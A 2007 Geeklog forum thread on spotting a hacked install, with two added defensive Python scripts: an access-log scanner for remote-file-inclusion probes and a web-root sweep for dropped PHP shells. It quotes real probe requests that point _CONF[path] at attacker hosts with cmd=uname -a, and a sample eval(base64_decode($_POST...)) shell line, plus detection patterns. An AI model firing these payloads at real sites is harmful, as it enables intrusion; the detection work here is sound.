Posted on: 06/26/07 01:44am
By: JohnG7
Hi all,
I don't suppose anyone knows of a way to tell if a geeklog install has been hacked?
Seems like someone keeps trying to hack through an IP from Mexico:
/geeklog/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://myfox.altervista.org/tool25.dat?&cmd=uname%20-a HTTP/1.1
Thanks in advance for any feedback.
Best,
john
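The request John quotes is the classic remote-file-inclusion probe: a query parameter (`_CONF[path]`) is pointed at a remote URL so that, with register_globals on, the plugin file includes attacker-hosted code, and a `cmd` parameter carries the command to run. The script below is an added example (not part of the original post or of Geeklog) that pulls such requests out of an Apache/Nginx combined-format access log so they can be counted per source IP. The log lines are constructed to resemble the ones in this thread; the IPs and hostnames in them are reserved or made-up values.

```python
"""Flag remote-file-inclusion (RFI) probes in web server access logs.

Added example, not Geeklog code. The log lines are constructed to resemble
the requests quoted in this thread; IPs and hostnames are reserved/made-up.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Apache/Nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A query parameter whose value is an absolute URL, also when it is nested
# inside another parameter (as in the /links/index.php?category=... request).
REMOTE_URL_RE = re.compile(r'[?&]([^&=]*)=(?:https?|ftps?)://', re.IGNORECASE)
# Parameter names an included shell would read its command from.
COMMAND_RE = re.compile(r'[?&](?:cmd|command|exec)=([^&]*)', re.IGNORECASE)
# Names that usually hold an include path or config value, i.e. the classic
# register_globals target ($_CONF['path'] in Geeklog's case).
PATH_PARAM_RE = re.compile(r'_CONF|path|dir|root|inc|include|file|page', re.IGNORECASE)

# Constructed sample log (not real traffic).
SAMPLE_LOG = """\
203.0.113.45 - - [26/Jun/2007:01:40:12 +0000] "GET /geeklog/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://example.invalid/tool25.dat?&cmd=uname%20-a HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.7 - - [26/Jun/2007:01:41:03 +0000] "GET /index.php?topic=security HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.45 - - [26/Jun/2007:01:42:55 +0000] "GET /links/index.php?category=Geeklog/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=http://example.invalid/test4? HTTP/1.0" 404 210 "-" "libwww-perl/5.805"
198.51.100.7 - - [26/Jun/2007:01:43:10 +0000] "GET /article.php?story=20070626&url=http://example.org/ HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""


def classify_request(target):
    """Return a finding dict for one request target, or None if it looks benign."""
    decoded = unquote(target)
    url_hit = REMOTE_URL_RE.search(decoded)
    if not url_hit:
        return None
    param = url_hit.group(1)
    cmd_hit = COMMAND_RE.search(decoded)
    # High confidence when the remote URL lands in a path/config variable or a
    # command parameter rides along; otherwise it may be a legitimate URL
    # argument and only deserves a human look.
    severity = "high" if (PATH_PARAM_RE.search(param) or cmd_hit) else "review"
    return {
        "param": param,
        "command": cmd_hit.group(1) if cmd_hit else None,
        "severity": severity,
        "target": target,
    }


def scan_log(text):
    """Parse combined-format log text and return the suspicious requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        finding = classify_request(m.group("target"))
        if finding:
            finding.update(ip=m.group("ip"), ua=m.group("ua"), status=m.group("status"))
            findings.append(finding)
    return findings


def count_by_ip(findings):
    """Sources to consider blocking, most active first."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f['severity']:6} {f['ip']:15} {f['param']} cmd={f['command']!r}")
    print(count_by_ip(hits))
```

Run it against a real access log with `scan_log(open(path).read())`. The status code is kept in each finding because it tells you whether the probe hit an existing file (a 200 on a plugin class file in the webroot is the case Dirk and jmucchiello describe); a 404 means the path is not exposed.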
Re: A way to tell if you've been hacked?
Posted on: 06/26/07 01:56am
By: jmucchiello
That's an old vulnerability. And a slim vulnerability at that. You had to run all of geeklog inside the webroot and had to have register_globals on. If you are using the latest GL, you are fine. Just block the IP if they are being annoying.
Re: A way to tell if you've been hacked?
Posted on: 06/26/07 01:54pm
By: Dirk
I'm actually seeing a lot of those on all my sites at the moment. If you don't have your plugin directory in the webroot, i.e. if you followed our installation instructions, you're safe from those anyway.
If you do have the plugins directory in your webroot, e.g. because you used Fantastico to install Geeklog, make sure you're running on the latest version. You could also password-protect those directories to be sure.
bye, Dirk
Re: A way to tell if you've been hacked?
Posted on: 06/26/07 08:38pm
By: andyofne
Quote by: jmucchiello: That's an old vulnerability. And a slim vulnerability at that. You had to run all of geeklog inside the webroot and had to have register_globals on. If you are using the latest GL, you are fine. Just block the IP if they are being annoying.
And yet it actually worked on my site because I chose to be crafty with my installation method and I didn't follow the instructions very well.
Re: A way to tell if you've been hacked?
Posted on: 06/27/07 12:22am
By: HerreVermeer
Quote by: Dirk: I'm actually seeing a lot of those on all my sites at the moment. If you don't have your plugin directory in the webroot, i.e. if you followed our installation instructions, you're safe from those anyway.
If you do have the plugins directory in your webroot, e.g. because you used Fantastico to install Geeklog, make sure you're running on the latest version. You could also password-protect those directories to be sure.
I suppose by following the exact directions you mean:
Root
|-my website.host.com
| |-Admin
| | |-Plugins
| |
| |-Plugins
|
|-Geeklog
  |-Plugins
I've been having problems too lately, my site was hacked (they replaced my index.php page, which was now displaying a message by whoever hacked me) twice in the last three days, by two different hackers from, as it seems, totally different countries. I haven't changed the code since the latest version (1.4.0) of geeklog was released, and I haven't installed any new plugins lately either.
I was running an old version of media gallery however (1.4.7) but upgraded to 1.5.0 today. Other than that I was running two other old plugins: filemgmt and chatterblog, which I have now completely deleted and uninstalled.
Other than having my index.php page replaced I found a file called c99.php, in two different locations somewhere in my public html folder, and my bad_behavior log is also showing some of the logs that John is talking about:
"Reason: User-Agent beginning with 'libwww-perl' prohibited
GET /links/index.php?category=Geeklog/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=http://kampsite.com/test4? HTTP/1.0" and much more of these
Is there any security leak that's been going on, or am I not protecting my files right (I have set it up as said in the geeklog installation, but not for any of the plugins)? Other than a little more than basic geeklog installations and handling I'm also still nothing more than a newbie. Is there any way to better protect my website from hackers undermining its security (from potential hackers who like to destroy more than just my index page)?
Thanks a lot,
Herre
Re: A way to tell if you've been hacked?
Posted on: 06/27/07 12:25am
By: HerreVermeer
Note that the last directory (plugins) is actually under the geeklog directory. The spaces got deleted when I posted.
Re: A way to tell if you've been hacked?
Posted on: 06/27/07 02:55pm
By: jmucchiello
Quote by: HerreVermeer: I found a file called c99.php
Delete it. It's a known backdoor. Google it and you will find just about every php project on the web has users asking what c99.php is.
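Deleting the one copy you noticed is not enough, as Herre's second compromise shows; you want to sweep the whole web root for anything that looks like a dropped shell and for entry pages that no longer match a known-good copy. The script below is an added example (not from this thread or from Geeklog) that does three checks over a directory tree: known shell filenames (c99 is the one named here; extend the list from your own notes), PHP files sitting in upload-only directories, and code constructs that shells nearly always contain (eval of a decoded payload, a system call fed from request data), plus a SHA-256 comparison against baseline hashes you recorded while the site was clean. `build_sample_tree()` writes a constructed web root into a temporary directory; the "shell" contents in it are inert strings and are never executed.

```python
"""Sweep a web root for dropped PHP shells and tampered entry pages.

Added example, not Geeklog code. build_sample_tree() writes a constructed
web root into a temporary directory; the "shell" contents are inert strings.
"""
import hashlib
import os
import re
import tempfile

# The backdoor named in this thread. Extend from your own incident notes.
KNOWN_SHELL_NAME_RE = re.compile(r'^c99.*\.php$', re.IGNORECASE)
# Code constructs that a dropped shell nearly always contains.
SUSPICIOUS_CODE = [
    ("eval of encoded payload",
     re.compile(r'\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(', re.I)),
    ("shell command from request data",
     re.compile(r'\b(?:system|passthru|shell_exec|exec|popen|proc_open)\s*\('
                r'\s*\$_(?:GET|POST|REQUEST|COOKIE)\b', re.I)),
]
# Top-level directories that hold uploads and must never contain PHP.
UPLOAD_DIRS = {"images", "uploads", "files"}


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_tree(root, baseline=None):
    """Return sorted (relative_path, reason) findings under root.

    baseline maps relative paths to the SHA-256 recorded when the site was
    known-good, so a replaced index.php is caught even if its content is bland.
    """
    baseline = baseline or {}
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if KNOWN_SHELL_NAME_RE.match(name):
                findings.append((rel, "known shell filename"))
            if name.lower().endswith(".php"):
                if rel.split("/")[0] in UPLOAD_DIRS:
                    findings.append((rel, "php file in upload directory"))
                with open(full, "r", errors="replace") as fh:
                    text = fh.read()
                for label, pattern in SUSPICIOUS_CODE:
                    if pattern.search(text):
                        findings.append((rel, f"suspicious code: {label}"))
                        break
            if rel in baseline and baseline[rel] != sha256_file(full):
                findings.append((rel, "hash differs from baseline"))
    return sorted(findings)


def _write(root, rel, content):
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as fh:
        fh.write(content)
    return full


def build_sample_tree():
    """Create a constructed web root; returns (root, baseline_hashes)."""
    root = tempfile.mkdtemp(prefix="webroot-")
    # Known-good state: record the hash of the entry page.
    index = _write(root, "index.php", "<?php require_once 'lib-common.php'; echo 'front page'; ?>")
    baseline = {"index.php": sha256_file(index)}
    _write(root, "lib-common.php", "<?php function COM_siteHeader() { return '<html>'; } ?>")
    # Simulated compromise, as described in the thread (inert strings only).
    _write(root, "index.php", "<?php echo 'defaced (constructed sample)'; ?>")
    _write(root, "images/c99.php", "<?php echo 'placeholder for an uploaded shell'; ?>")
    _write(root, "plugins/spamx/cache.php", "<?php eval(base64_decode($_POST['p'])); ?>")
    return root, baseline


if __name__ == "__main__":
    root, baseline = build_sample_tree()
    for rel, reason in scan_tree(root, baseline):
        print(f"{rel:28} {reason}")
```

On a real site, record the baseline right after a clean install or upgrade (`{rel: sha256_file(path) for each file}`) and keep it off the web server, then run `scan_tree("/path/to/public_html", baseline)` from cron. A hash mismatch on a file you did not change is the signal Herre was missing: the second c99.php copy was only found after the second defacement.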
Re: A way to tell if you've been hacked?
Posted on: 06/27/07 03:01pm
By: Dirk
Quote by: HerreVermeer: I haven't changed the code since the latest version (1.4.0) of geeklog was released, and I haven't installed any new plugins lately either.
You should be running 1.4.0sr5-1, if you're still on a 1.4.0 version. In 1.4.0sr4, we had to remove the FCKeditor's file manager due to a security issue that let people upload files. Make sure you've really removed it.
Quote by: HerreVermeer: Other than having my index.php page replaced I found a file called c99.php
That's probably a PHP shell they managed to upload.
As I already said above, the log entries are nothing to worry about if you've secured your installation.
bye, Dirk
Re: A way to tell if you've been hacked?
Posted on: 06/27/07 03:57pm
By: HerreVermeer
My bad, I've been running geeklog version 1.4.1 for a while instead of 1.4.0 like I posted before.
About the c99.php file, I already got rid of them.
After the first time I got hacked I just found the first one. I didn't realize that there was a second one until I got hacked again, two days later.
I don't know for how long those files have been on my website, it might be that they have been there for a while. More importantly, this time I made sure that there are no more versions of the c99.php file present on my website. I haven't been hacked today... so my hopes are up.